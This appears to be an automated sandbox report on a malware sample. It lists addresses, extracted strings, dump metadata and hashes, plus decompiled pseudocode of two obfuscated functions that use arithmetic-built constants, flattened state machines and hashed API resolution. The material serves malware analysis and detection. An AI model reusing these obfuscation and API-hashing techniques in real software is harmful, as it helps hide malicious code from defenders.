0x0473b4de
0x0473b4e6
0x0473b4ee
0x0473b4f6
0x0473b4fe
0x0473b506
0x0473b50e
0x0473b516
0x0473b51e
0x0473b526
0x0473b52b
0x0473b533
0x0473b53b
0x0473b543
0x0473b548
0x0473b54c
0x0473b551
0x0473b559
0x0473b561
0x0473b569
0x0473b56e
0x0473b578
0x0473b587
0x0473b58a
0x0473b58e
0x0473b596
0x0473b59e
0x0473b5a6
0x0473b5ae
0x0473b5bb
0x0473b5bf
0x0473b5c7
0x0473b5d3
0x0473b5d8
0x0473b5de
0x0473b5e6
0x0473b5ee
0x0473b5f2
0x0473b5f7
0x0473b5ff
0x0473b607
0x0473b619
0x0473b61c
0x0473b620
0x0473b628
0x0473b630
0x0473b634
0x0473b63c
0x0473b644
0x0473b651
0x0473b655
0x0473b65d
0x0473b665
0x0473b672
0x0473b676
0x0473b67e
0x0473b686
0x0473b68b
0x0473b693
0x0473b69b
0x0473b6ae
0x0473b6b5
0x0473b6c0
0x0473b6c8
0x0473b6d0
0x0473b6d8
0x0473b6e0
0x0473b6ed
0x0473b6f1
0x0473b6f9
0x0473b701
0x0473b709
0x0473b70e
0x0473b716
0x0473b71e
0x0473b726
0x0473b72e
0x0473b733
0x0473b73b
0x0473b743
0x0473b74b
0x0473b753
0x0473b75b
0x0473b763
0x0473b76b
0x0473b778
0x0473b785
0x0473b792
0x0473b79a
0x0473b7a2
0x0473b7aa
0x0473b7b2
0x0473b7ba
0x0473b7c2
0x0473b7ca
0x0473b7d2
0x0473b7da
0x0473b7e2
0x0473b7ea
0x0473b7f2
0x0473b7f2
0x0473b800
0x0473b94e
0x0473b806
0x0473b808
0x0473b911
0x0473b916
0x0473b919
0x0473b91b
0x0473b91d
0x00000000
0x0473b91d
0x0473b80e
0x0473b80e
0x0473b810
0x00000000
0x0473b816
0x0473b830
0x0473b835
0x0473b83a
0x0473b842
0x0473b846
0x0473b859
0x0473b8d6
0x0473b8e7
0x0473b8ec
0x0473b8ef
0x00000000
0x0473b8ef
0x0473b810
0x0473b808
0x0473b957
0x0473b962
0x0473b962
0x0473b924
0x0473b926
0x0473b926
0x0473b926
0x00000000

Strings

c(J, xrefs: 0473B416
)a, xrefs: 0473B5A6
o<A, xrefs: 0473B49D
C5B, xrefs: 0473B559
T, xrefs: 0473B68B
2a\, xrefs: 0473B785
K, xrefs: 0473B69B
62y, xrefs: 0473B543
d1, xrefs: 0473B67E
D, xrefs: 0473B846

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: d1$)a$2a\$62y$C5B$D$K$c(J$o<A$T
API String ID: 0-479591988
Opcode ID: 33fdc7e65311659f0099c34c9e7a2e6ebda7831b50980e003ab1597afaf32529
Instruction ID: beeb55e7f27c4600316bc9966b0b0285270e60979e273525c4f2f14f1efe75f2
Opcode Fuzzy Hash: 33fdc7e65311659f0099c34c9e7a2e6ebda7831b50980e003ab1597afaf32529
Instruction Fuzzy Hash: DAD12FB15083809FD364CF66C989A5BFBE1FBC4708F508A1DF5A686260D7B19909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04730610, Relevance: 12.7, Strings: 10, Instructions: 208
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04730610() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _t187;
				void* _t188;
				signed int _t189;
				void* _t195;
				void* _t213;
				void* _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				intOrPtr* _t224;
				signed int _t225;
				signed int* _t226;

				_t226 =  &_v72;
				_v48 = 0xb7746c;
				_t195 = 0x63b60cf;
				_t219 = 0x29;
				_v48 = _v48 / _t219;
				_t218 = 0;
				_t220 = 0x55;
				_v48 = _v48 * 0x2d;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x00182b48;
				_v20 = 0x4c0a0e;
				_v20 = _v20 + 0xd77e;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x000d6733;
				_v40 = 0x669fd2;
				_v40 = _v40 ^ 0x10360f94;
				_v40 = _v40 >> 0x10;
				_v40 = _v40 * 0x1b;
				_v40 = _v40 ^ 0x0003f178;
				_v12 = 0x6e6d3a;
				_v12 = _v12 + 0xf926;
				_v12 = _v12 ^ 0x006ac404;
				_v44 = 0xe3dc94;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 / _t220;
				_v44 = _v44 | 0x2409d604;
				_v44 = _v44 ^ 0x240fc48a;
				_v52 = 0x2bd4d0;
				_v52 = _v52 << 8;
				_v52 = _v52 | 0xcf293513;
				_t221 = 0x2d;
				_v52 = _v52 * 0x43;
				_v52 = _v52 ^ 0xcf7e5c03;
				_v56 = 0xfda448;
				_v56 = _v56 >> 3;
				_v56 = _v56 | 0x2cd36f56;
				_v56 = _v56 + 0x95;
				_v56 = _v56 ^ 0x2ce8f7f6;
				_v28 = 0x213e3d;
				_t67 =  &_v28; // 0x213e3d
				_v28 =  *_t67 * 0x44;
				_v28 = _v28 + 0x69b0;
				_v28 = _v28 ^ 0x08d13d59;
				_v68 = 0x811ac6;
				_v68 = _v68 + 0xffff71aa;
				_v68 = _v68 + 0xb4b6;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x000ae613;
				_v72 = 0xcaa911;
				_v72 = _v72 * 0x1f;
				_v72 = _v72 + 0xffff55b6;
				_v72 = _v72 >> 9;
				_v72 = _v72 ^ 0x000030c7;
				_v16 = 0xaf0e56;
				_v16 = _v16 + 0xffff40ad;
				_v16 = _v16 ^ 0x00a2f6c7;
				_v24 = 0xa090a8;
				_v24 = _v24 << 0xd;
				_v24 = _v24 / _t221;
				_v24 = _v24 ^ 0x0067584f;
				_v60 = 0xc470a0;
				_v60 = _v60 ^ 0xff35625e;
				_v60 = _v60 >> 0xb;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x09fdaf67;
				_v64 = 0x78766f;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6f6a;
				_v64 = _v64 ^ 0xa6d41ef3;
				_v64 = _v64 ^ 0xa6d90496;
				_v32 = 0x98356a;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0x92fe;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0xf17ec4ba;
				_v4 = 0xa58980;
				_v4 = _v4 + 0x7b33;
				_v4 = _v4 ^ 0x00a6c5e4;
				_t194 = _v4;
				_t225 = _v4;
				_t222 = _v4;
				_v8 = 0x9c962;
				_v8 = _v8 | 0x9b33f532;
				_v8 = _v8 ^ 0x9b3ed428;
				_v36 = 0xcc65e6;
				_v36 = _v36 + 0xf773;
				_v36 = _v36 | 0x86bb155f;
				_v36 = _v36 ^ 0x696ba9b9;
				_v36 = _v36 ^ 0xef99073e;
				while(1) {
					L1:
					_push(0x5c);
					while(1) {
						L2:
						do {
							L3:
							while(_t195 != 0x4d5d32c) {
								if(_t195 == 0x63b60cf) {
									_t195 = 0xdc6513a;
									continue;
								} else {
									if(_t195 == 0x8315d2e) {
										_t189 = E047388BF(_v48, _t194, _v52, _v56, _t222);
										_t226 =  &(_t226[3]);
										_t225 = _t189;
										_t188 = 0xe98919b;
										_t195 =  !=  ? 0xe98919b : 0xd7b6b30;
										_t213 = 0x5c;
										continue;
									} else {
										if(_t195 == 0xb9ee7f4) {
											E04726274(_v16, _t225, _v24, _v60, _v64);
											_t226 =  &(_t226[3]);
											_t195 = 0xd7b6b30;
											while(1) {
												L1:
												_push(0x5c);
												goto L2;
											}
										} else {
											if(_t195 == 0xd7b6b30) {
												E04726274(_v32, _t194, _v4, _v8, _v36);
											} else {
												if(_t195 == 0xdc6513a) {
													_t224 =  *0x47461fc + 0x234;
													while( *_t224 != _t213) {
														_t224 = _t224 + 2;
													}
													_t222 = _t224 + 2;
													_t195 = 0x4d5d32c;
													goto L2;
												} else {
													if(_t195 != _t188) {
														goto L21;
													} else {
														E04727B75(_v28, _t225, _v68, _v72);
														_t218 =  !=  ? 1 : _t218;
														_t195 = 0xb9ee7f4;
														while(1) {
															L1:
															_push(0x5c);
															L2:
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _t218;
							}
							_t187 = E04735BBD(_v20, _v40, _t195, _v12, _v44);
							_t194 = _t187;
							_t226 =  &(_t226[4]);
							if(_t187 == 0) {
								_t195 = 0x54826c7;
								_t188 = 0xe98919b;
								_t213 = 0x5c;
								goto L21;
							} else {
								_t195 = 0x8315d2e;
								goto L1;
							}
							goto L24;
							L21:
						} while (_t195 != 0x54826c7);
						goto L24;
					}
				}
			}

0x04730610
0x04730613
0x04730621
0x0473062c
0x04730631
0x0473063c
0x0473063e
0x04730641
0x04730645
0x0473064a
0x04730652
0x0473065a
0x04730662
0x04730667
0x0473066f
0x04730677
0x0473067f
0x04730689
0x0473068d
0x04730695
0x0473069d
0x047306a5
0x047306ad
0x047306b5
0x047306c2
0x047306c6
0x047306ce
0x047306d6
0x047306de
0x047306e3
0x047306f0
0x047306f1
0x047306f5
0x047306fd
0x04730705
0x0473070a
0x04730712
0x0473071a
0x04730722
0x0473072a
0x0473072f
0x04730733
0x0473073b
0x04730743
0x0473074b
0x04730753
0x0473075b
0x04730760
0x04730768
0x04730775
0x04730779
0x04730781
0x04730786
0x0473078e
0x04730796
0x0473079e
0x047307a6
0x047307ae
0x047307b9
0x047307bd
0x047307c5
0x047307cd
0x047307d5
0x047307df
0x047307e3
0x047307eb
0x047307f3
0x047307f8
0x04730800
0x04730808
0x04730810
0x04730818
0x0473081d
0x04730825
0x0473082a
0x04730832
0x0473083a
0x04730842
0x0473084a
0x0473084e
0x04730852
0x04730856
0x0473085e
0x04730866
0x0473086e
0x04730876
0x0473087e
0x04730886
0x0473088e
0x04730896
0x04730896
0x04730896
0x04730899
0x04730899
0x0473089e
0x00000000
0x0473089e
0x047308b0
0x04730981
0x00000000
0x047308b6
0x047308bc
0x04730960
0x04730965
0x04730968
0x04730971
0x04730976
0x0473097b
0x00000000
0x047308c2
0x047308c8
0x0473093f
0x04730944
0x04730947
0x04730896
0x04730896
0x04730896
0x00000000
0x04730898
0x047308ca
0x047308d0
0x047309e1
0x047308d6
0x047308dc
0x04730910
0x0473091b
0x04730918
0x04730918
0x04730920
0x04730923
0x00000000
0x047308de
0x047308e0
0x00000000
0x047308e6
0x047308f4
0x04730900
0x04730903
0x04730896
0x04730896
0x04730896
0x04730899
0x00000000
0x04730899
0x04730896
0x047308e0
0x047308dc
0x047308d0
0x047308c8
0x047308bc
0x047309e9
0x047309f2
0x047309f2
0x0473099c
0x047309a1
0x047309a3
0x047309a8
0x047309b6
0x047309bb
0x047309c0
0x00000000
0x047309aa
0x047309aa
0x00000000
0x047309aa
0x00000000
0x047309c1
0x047309c1
0x00000000
0x047309cd
0x04730899

Strings

0k{, xrefs: 0473096C
:mn, xrefs: 04730695
ovx, xrefs: 047307EB
0k{, xrefs: 04730947
=>!, xrefs: 0473072A
jo, xrefs: 047307F8
3{, xrefs: 0473083A
0k{, xrefs: 047308CA
OXg, xrefs: 047307BD
3g, xrefs: 04730667

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 0k{$0k{$0k{$3g$3{$:mn$=>!$OXg$jo$ovx
API String ID: 0-2389895590
Opcode ID: c8286bc94b1ee79c35f28ce589270cf98879679e9549c3be1b47806bf7395ff3
Instruction ID: df2b030a4e4d3143e703e25504bc9a7dc5901b3e394e2aa4dba4047ce24caadd
Opcode Fuzzy Hash: c8286bc94b1ee79c35f28ce589270cf98879679e9549c3be1b47806bf7395ff3
Instruction Fuzzy Hash: 48A1517150D3819FD798CF24C98A42BBBE1FBC0758F40592DF68696261E3B59A08CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0472A34E, Relevance: 11.8, Strings: 9, Instructions: 576
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0472A34E(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v128;
				char _v256;
				char _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr* _v312;
				intOrPtr _v316;
				signed int _v320;
				unsigned int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				unsigned int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				intOrPtr* _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				void* _t608;
				intOrPtr* _t610;
				intOrPtr _t614;
				void* _t623;
				signed int _t636;
				int _t643;
				signed int _t645;
				intOrPtr _t646;
				intOrPtr _t650;
				intOrPtr* _t651;
				signed int _t672;
				void* _t725;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				intOrPtr _t745;
				void* _t746;
				void* _t749;
				void* _t753;
				intOrPtr _t754;
				signed int* _t755;
				void* _t760;

				_t651 = __ecx;
				_t755 =  &_v552;
				_v312 = __edx;
				_v524 = __ecx;
				_v292 = _v292 & 0x00000000;
				_v304 = 0x1d9343;
				_v300 = 0xaa451d;
				_v296 = 0xc9465;
				_v472 = 0x3a6a6f;
				_v472 = _v472 | 0xc2ba592b;
				_v472 = _v472 + 0xffffb3ea;
				_v472 = _v472 ^ 0xc2ba2f59;
				_v452 = 0xbfec77;
				_v452 = _v452 << 9;
				_v452 = _v452 << 1;
				_v452 = _v452 ^ 0xffb46efe;
				_v460 = 0x8c19df;
				_v460 = _v460 * 0x53;
				_t749 = 0xd93b09f;
				_v460 = _v460 >> 0xb;
				_v460 = _v460 ^ 0x00050e5e;
				_v444 = 0x59ed02;
				_v444 = _v444 + 0xffff80ed;
				_v444 = _v444 | 0x98e5275e;
				_v444 = _v444 ^ 0x98f6899e;
				_v532 = 0x8962c9;
				_v532 = _v532 + 0x31dd;
				_v532 = _v532 << 0x10;
				_t729 = 0x35;
				_v532 = _v532 * 0x13;
				_v532 = _v532 ^ 0x085a3a0c;
				_v540 = 0xcc9ba8;
				_v540 = _v540 / _t729;
				_v540 = _v540 + 0x1f09;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x000b3087;
				_v396 = 0xefdbe2;
				_v396 = _v396 ^ 0x86ef0f2f;
				_v396 = _v396 ^ 0x86022ff4;
				_v536 = 0x935824;
				_v536 = _v536 >> 0xf;
				_v536 = _v536 + 0xffff46c6;
				_t730 = 0x71;
				_v536 = _v536 / _t730;
				_v536 = _v536 ^ 0x0248b9e0;
				_v512 = 0x4028b9;
				_v512 = _v512 << 1;
				_v512 = _v512 << 0xf;
				_v512 = _v512 + 0xffff6fd4;
				_v512 = _v512 ^ 0x28b353ee;
				_v424 = 0x7a662b;
				_v424 = _v424 + 0x2f18;
				_v424 = _v424 >> 5;
				_v424 = _v424 ^ 0x000b5638;
				_v456 = 0xda3936;
				_t731 = 0x32;
				_v456 = _v456 / _t731;
				_v456 = _v456 >> 1;
				_v456 = _v456 ^ 0x000fd1c7;
				_v440 = 0x8f5e7e;
				_v440 = _v440 << 8;
				_v440 = _v440 << 7;
				_v440 = _v440 ^ 0xaf31ce77;
				_v496 = 0xc4af0b;
				_v496 = _v496 << 2;
				_v496 = _v496 + 0xd096;
				_v496 = _v496 ^ 0xecd42be9;
				_v496 = _v496 ^ 0xefceefd1;
				_v428 = 0xaf81f7;
				_v428 = _v428 + 0xffff2852;
				_v428 = _v428 ^ 0xc91e25dc;
				_v428 = _v428 ^ 0xc9bf4949;
				_v324 = 0x941326;
				_v324 = _v324 >> 1;
				_v324 = _v324 ^ 0x0045ebda;
				_v408 = 0x8b2724;
				_t732 = 0x15;
				_v408 = _v408 / _t732;
				_v408 = _v408 ^ 0x00052f6e;
				_v488 = 0x36cc0a;
				_t733 = 0x63;
				_v488 = _v488 / _t733;
				_t734 = 0x18;
				_v488 = _v488 * 0xb;
				_v488 = _v488 ^ 0xa41954db;
				_v488 = _v488 ^ 0xa419a364;
				_v328 = 0x1f3f94;
				_v328 = _v328 * 0x5e;
				_v328 = _v328 ^ 0x0b70dec2;
				_v464 = 0xec59a7;
				_v464 = _v464 + 0xfb24;
				_v464 = _v464 << 0x10;
				_v464 = _v464 ^ 0x54c29c92;
				_v432 = 0xf8f323;
				_v432 = _v432 * 0x63;
				_v432 = _v432 + 0xffff4747;
				_v432 = _v432 ^ 0x604b8b90;
				_v544 = 0x9ccd35;
				_v544 = _v544 * 0x35;
				_v544 = _v544 | 0xf5bcbf73;
				_v544 = _v544 ^ 0xf5f5836a;
				_v552 = 0xe7bdbb;
				_v552 = _v552 << 3;
				_v552 = _v552 / _t734;
				_t735 = 0x55;
				_v552 = _v552 * 0x56;
				_v552 = _v552 ^ 0x19fdf177;
				_v476 = 0x4b36f9;
				_v476 = _v476 / _t735;
				_v476 = _v476 | 0x4f2a4c69;
				_v476 = _v476 ^ 0x4f2ffaa4;
				_v344 = 0xa8e113;
				_v344 = _v344 ^ 0x955e2163;
				_v344 = _v344 ^ 0x95f6b537;
				_v400 = 0x6b006d;
				_v400 = _v400 + 0xbbd3;
				_v400 = _v400 ^ 0x006e4ab3;
				_v528 = 0x51d9a4;
				_v528 = _v528 * 0x39;
				_v528 = _v528 + 0xffff3a18;
				_v528 = _v528 ^ 0x4eafa0ba;
				_v528 = _v528 ^ 0x5c999bc5;
				_v384 = 0xd8f094;
				_t736 = 0xa;
				_v384 = _v384 / _t736;
				_v384 = _v384 ^ 0x00113a39;
				_v320 = 0x7c24a6;
				_v320 = _v320 ^ 0x8bbd847d;
				_v320 = _v320 ^ 0x8bc84983;
				_v392 = 0x39eeda;
				_v392 = _v392 + 0x8a2;
				_v392 = _v392 ^ 0x003ee406;
				_v436 = 0xbd7342;
				_v436 = _v436 >> 0xe;
				_v436 = _v436 ^ 0xd18e2b86;
				_v436 = _v436 ^ 0xd18b78ad;
				_v388 = 0x1f54c3;
				_t737 = 0x3c;
				_v388 = _v388 * 0x4e;
				_v388 = _v388 ^ 0x09836504;
				_v416 = 0x7ecf05;
				_v416 = _v416 / _t737;
				_v416 = _v416 ^ 0x00080a2f;
				_v504 = 0xeb03ca;
				_v504 = _v504 + 0xf066;
				_v504 = _v504 + 0xffff4b7c;
				_v504 = _v504 + 0xffffaac8;
				_v504 = _v504 ^ 0x00eb88ee;
				_v360 = 0xe3654d;
				_v360 = _v360 ^ 0x2b175bf1;
				_v360 = _v360 ^ 0x2bf685da;
				_v340 = 0x7c2094;
				_t738 = 0x43;
				_v340 = _v340 * 0x1c;
				_v340 = _v340 ^ 0x0d947d6b;
				_v368 = 0xbdd29f;
				_v368 = _v368 + 0x73c5;
				_v368 = _v368 ^ 0x00b585d7;
				_v520 = 0xcddc3b;
				_v520 = _v520 + 0xffffd25c;
				_v520 = _v520 / _t738;
				_v520 = _v520 >> 0xa;
				_v520 = _v520 ^ 0x000a0ab6;
				_v332 = 0x802855;
				_v332 = _v332 << 7;
				_v332 = _v332 ^ 0x401e0ae1;
				_v376 = 0x4ada8f;
				_v376 = _v376 ^ 0x2dd24592;
				_v376 = _v376 ^ 0x2d95854a;
				_v352 = 0xe2d0e7;
				_v352 = _v352 + 0x7fde;
				_v352 = _v352 ^ 0x00ec87b6;
				_v448 = 0x215c00;
				_v448 = _v448 | 0xfd7730aa;
				_v448 = _v448 >> 2;
				_v448 = _v448 ^ 0x3f5bf372;
				_v336 = 0xea431e;
				_t739 = 0x16;
				_v336 = _v336 / _t739;
				_v336 = _v336 ^ 0x000c1817;
				_v404 = 0x519d31;
				_t740 = 0x6f;
				_v404 = _v404 / _t740;
				_v404 = _v404 ^ 0x000688de;
				_v468 = 0x925248;
				_v468 = _v468 | 0x9d7bff3e;
				_v468 = _v468 ^ 0x9dffa61e;
				_v548 = 0x9b600e;
				_t645 = 9;
				_v548 = _v548 / _t645;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 | 0x543bf15b;
				_v548 = _v548 ^ 0x543b4847;
				_v412 = 0x2beae;
				_v412 = _v412 + 0xbed2;
				_v412 = _v412 ^ 0x000f44fc;
				_v420 = 0x57c569;
				_v420 = _v420 ^ 0x71a38f64;
				_v420 = _v420 << 0xc;
				_v420 = _v420 ^ 0x44a2398e;
				_v364 = 0x65906d;
				_v364 = _v364 << 7;
				_v364 = _v364 ^ 0x32cf58cc;
				_v492 = 0x8893c3;
				_t741 = 0x70;
				_v492 = _v492 / _t741;
				_t742 = 0x51;
				_v492 = _v492 / _t742;
				_v492 = _v492 ^ 0xfe6f9753;
				_v492 = _v492 ^ 0xfe6d89cd;
				_v500 = 0xd039c1;
				_v500 = _v500 + 0xffff2367;
				_v500 = _v500 + 0x848c;
				_t743 = 0xd;
				_v500 = _v500 * 0x78;
				_v500 = _v500 ^ 0x617bf5a3;
				_v508 = 0x5170a9;
				_v508 = _v508 + 0xaa1d;
				_v508 = _v508 ^ 0x3d4cdf4d;
				_v508 = _v508 * 0x57;
				_v508 = _v508 ^ 0xc571f34a;
				_v484 = 0xa2c292;
				_v484 = _v484 | 0xdc2186b7;
				_v484 = _v484 * 0x30;
				_v484 = _v484 ^ 0x9e8f62ec;
				_v484 = _v484 ^ 0xc036c575;
				_v348 = 0x99d88d;
				_v348 = _v348 | 0x11301659;
				_v348 = _v348 ^ 0x11b0daf0;
				_v356 = 0xb9a791;
				_v356 = _v356 << 3;
				_v356 = _v356 ^ 0x05c530b1;
				_v516 = 0x1038cf;
				_v516 = _v516 / _t743;
				_v516 = _v516 >> 0xa;
				_v516 = _v516 | 0x72309557;
				_v516 = _v516 ^ 0x7236c8f3;
				_v480 = 0xec6f30;
				_v480 = _v480 << 2;
				_t744 = 0x5e;
				_v480 = _v480 / _t744;
				_v480 = _v480 ^ 0x000edd62;
				_t646 = _v312;
				_t754 = _v312;
				_t745 = _v312;
				_v372 = 0x8bd8b;
				_v372 = _v372 << 5;
				_v372 = _v372 ^ 0x011a7c99;
				_v380 = 0xf9b239;
				_v380 = _v380 + 0xff4;
				_v380 = _v380 ^ 0x00fd31a4;
				while(1) {
					_t760 = _t749 - 0xb7e92db;
					if(_t760 <= 0) {
					}
					L2:
					if(_t760 != 0) {
						if(_t749 == 0x134fea9) {
							_push(_v504);
							_v308 = _t745 + _t754;
							_t646 = E0472647F(_v340, E04725E78(_v416, 0x4721268), _t745 + _t754 - _t754, _v368,  &_v288, _t754, _v520, _v332,  &_v128,  &_v256, _v376) + _t754;
							E047263E1(_v352, _t615, _v448, _v336);
							_t755 =  &(_t755[0xd]);
							_t749 = 0xe0fd360;
							goto L12;
						} else {
							if(_t749 == 0x539c4c0) {
								E0472CE30(_v316, _v516, _v480, _v372, _v380);
								return 0;
							}
							if(_t749 == 0x5ad8c54) {
								_push(0x4721218);
								_push(_v528);
								_t623 = E04737AF5(_v344, _v400, __eflags);
								_push( &_v256);
								_push(_t623);
								_push(_t745);
								_push(_v316);
								 *((intOrPtr*)(E047429C4(0x9fb4a448, 0x5c)))();
								E047263E1(_v384, _t623, _v320, _v392);
								_t755 =  &(_t755[6]);
								_t749 = 0xc0961ce;
								goto L12;
							} else {
								if(_t749 == 0x68c1898) {
									_t745 = E0473E813(0x10, 4);
									E04735E82(_t745, _v424, 0xb,  &_v128, _v456, _v440, _v496);
									_t749 = 0xa0b5d3c;
									goto L11;
								} else {
									if(_t749 != 0xa0b5d3c) {
										L29:
										__eflags = _t749 - 0xef8d15d;
									} else {
										_t753 =  &_v256;
										_t725 = E0473E813(0x10, 8);
										_t636 = _v472;
										if(_t636 < _t725) {
											_t728 = _t725 - _t636;
											_t746 = _t753;
											_t672 = _t728 >> 1;
											_t643 = memset(_t746, 0x2d002d, _t672 << 2);
											asm("adc ecx, ecx");
											_t753 = _t753 + _t728 * 2;
											memset(_t746 + _t672, _t643, 0);
											_t755 =  &(_t755[6]);
										}
										_t745 = E0473E813(0x10, 8);
										E04735E82(_t745, _v328, 0xb, _t753, _v464, _v432, _v544);
										_t749 = 0xb7e92db;
										L11:
										_t755 =  &(_t755[7]);
										L12:
										_t651 = _v524;
										continue;
										do {
											while(1) {
												_t760 = _t749 - 0xb7e92db;
												if(_t760 <= 0) {
												}
												goto L18;
											}
											goto L2;
										} while (__eflags != 0);
										L33:
										return _v316;
									}
								}
							}
						}
					}
					_t745 = 0x4000;
					_push(_t651);
					_t614 = E04735A10(0x4000);
					_v316 = _t614;
					__eflags = _t614;
					if(__eflags != 0) {
						_t749 = 0x5ad8c54;
						goto L12;
					}
					return _t614;
					L35:
					L18:
					__eflags = _t749 - 0xc0961ce;
					if(_t749 == 0xc0961ce) {
						_t745 = _t745 +  *((intOrPtr*)(_t651 + 4));
						_push(_t651);
						_t754 = E04735A10(_t745);
						__eflags = _t754;
						if(__eflags == 0) {
							_t651 = _v524;
							_t749 = 0x539c4c0;
							goto L29;
						} else {
							_t749 = 0x134fea9;
							goto L12;
						}
					} else {
						__eflags = _t749 - 0xc6604bd;
						if(_t749 == 0xc6604bd) {
							_t745 = E0473E813(8, 1);
							E04735E82(_t745, _v444, 9,  &_v288, _v532, _v540, _v396);
							_t749 = 0x68c1898;
							goto L11;
						} else {
							__eflags = _t749 - 0xd757a21;
							if(_t749 == 0xd757a21) {
								_push(_v364);
								_t608 = E0472B8EE(_v492, _v308 - _t646, E04725E78(_v420, 0x47211c8), _v500, _t646, _v508);
								E047263E1(_v484, _t605, _v348, _v356);
								_t610 = _v312;
								_t650 = _t646 + _t608 - _t754;
								__eflags = _t650;
								 *_t610 = _t754;
								 *((intOrPtr*)(_t610 + 4)) = _t650;
								goto L33;
							}
							__eflags = _t749 - 0xd93b09f;
							if(__eflags == 0) {
								_t749 = 0xc6604bd;
								continue;
							} else {
								__eflags = _t749 - 0xe0fd360;
								if(_t749 != 0xe0fd360) {
									goto L29;
								} else {
									E0472E018(_v404, _v468,  *((intOrPtr*)(_t651 + 4)), _v548, _t646,  *_t651, _v412);
									_t651 = _v524;
									_t755 =  &(_t755[5]);
									_t749 = 0xd757a21;
									_t646 = _t646 +  *((intOrPtr*)(_t651 + 4));
									continue;
								}
							}
						}
					}
					goto L35;
				}
			}

0x0472a34e
0x0472a34e
0x0472a358
0x0472a35f
0x0472a363
0x0472a36b
0x0472a376
0x0472a381
0x0472a38c
0x0472a394
0x0472a39c
0x0472a3a4
0x0472a3ac
0x0472a3b4
0x0472a3b9
0x0472a3bd
0x0472a3c5
0x0472a3d2
0x0472a3d6
0x0472a3db
0x0472a3e0
0x0472a3e8
0x0472a3f0
0x0472a3f8
0x0472a400
0x0472a408
0x0472a410
0x0472a418
0x0472a426
0x0472a429
0x0472a42d
0x0472a435
0x0472a445
0x0472a449
0x0472a451
0x0472a455
0x0472a45d
0x0472a468
0x0472a473
0x0472a47e
0x0472a486
0x0472a48b
0x0472a497
0x0472a49c
0x0472a4a2
0x0472a4aa
0x0472a4b2
0x0472a4b6
0x0472a4bb
0x0472a4c3
0x0472a4cb
0x0472a4d6
0x0472a4e1
0x0472a4e9
0x0472a4f4
0x0472a500
0x0472a503
0x0472a507
0x0472a50b
0x0472a513
0x0472a51e
0x0472a526
0x0472a52e
0x0472a539
0x0472a541
0x0472a546
0x0472a550
0x0472a558
0x0472a560
0x0472a56b
0x0472a576
0x0472a581
0x0472a58c
0x0472a597
0x0472a59e
0x0472a5a9
0x0472a5bd
0x0472a5c2
0x0472a5cb
0x0472a5d6
0x0472a5e2
0x0472a5e7
0x0472a5f2
0x0472a5f5
0x0472a5f9
0x0472a601
0x0472a609
0x0472a61c
0x0472a623
0x0472a62e
0x0472a636
0x0472a63e
0x0472a643
0x0472a64b
0x0472a65e
0x0472a665
0x0472a670
0x0472a67b
0x0472a688
0x0472a68c
0x0472a694
0x0472a69c
0x0472a6a4
0x0472a6b1
0x0472a6ba
0x0472a6bb
0x0472a6bf
0x0472a6c7
0x0472a6d5
0x0472a6d9
0x0472a6e1
0x0472a6e9
0x0472a6f4
0x0472a6ff
0x0472a70a
0x0472a715
0x0472a720
0x0472a72b
0x0472a738
